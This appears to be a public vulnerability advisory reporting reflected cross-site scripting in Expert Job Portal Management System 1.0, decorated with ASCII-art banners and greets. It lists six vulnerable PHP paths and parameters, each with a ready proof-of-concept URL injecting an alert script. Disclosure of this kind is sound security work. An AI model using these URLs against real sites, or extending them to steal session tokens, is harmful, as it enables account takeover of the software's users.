Headline
Expert Job Portal Management System 1.0 Cross Site Scripting
Expert Job Portal Management System version 1.0 suffers from a cross site scripting vulnerability.
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
││ C r a C k E r ┌┘
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││
└───────────────────────────────────────────────────────────────────────────────────────┘┘
┌──── From The Ashes and Dust Rises An Unimaginable crack… ────┐
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ [ Vulnerability ] ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: Author : CraCkEr :
│ Website : https://www.codester.com/items/20720/ │
│ Vendor : Expert IT Solution │
│ Software : Expert Job Portal Management System 1.0 │
│ Vuln Type: Reflected XSS │
│ Impact : Manipulate the content of the site │
│ │
│────────────────────────────────────────────────────────────────────────────────────────│
│ ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: :
│ Release Notes: │
│ ═════════════ │
│ The attacker can send to victim a link containing a malicious URL in an email or │
│ instant message can perform a wide variety of actions, such as stealing the victim’s │
│ session token or login credentials │
│ │
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
Greets:
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL
CryptoJob (Twitter) twitter.com/0x0CryptoJob
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ © CraCkEr 2023 ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
Path: /catgeory.php
GET parameter ‘cate_name’ is vulnerable to RXSS
https://website/catgeory.php?cate_name=Accounting%2fFinancexpy42%3cscript%3ealert(1)%3c%2fscript%3ey4al4
Path: /city.php
GET parameter ‘city’ is vulnerable to RXSS
https://website/city.php?city=Barisaln59xr%3cscript%3ealert(1)%3c%2fscript%3eqtv0k
Path: /company_type_info.php
GET parameter ‘com_type’ is vulnerable to RXSS
https://website/company_type_info.php?com_type=Agentitub5%3cscript%3ealert(1)%3c%2fscript%3ehvwa4
Path: /division.php
GET parameter ‘d’ is vulnerable to RXSS
https://website/division.php?d=Chittagong%20Divisionnxxkk%3cscript%3ealert(1)%3c%2fscript%3egadkq
Path: /country.php
GET parameter ‘c’ is vulnerable to RXSS
https://website/country.php?c=tjof1%22%3e%3cscript%3ealert(1)%3c%2fscript%3eky8lq
Path: /trainning_list.php
GET parameter ‘category_nametra’ is vulnerable to RXSS
https://website/trainning_list.php?category_nametra=ITpuvvx%3cscript%3ealert(1)%3c%2fscript%3enpn2x
[-] Done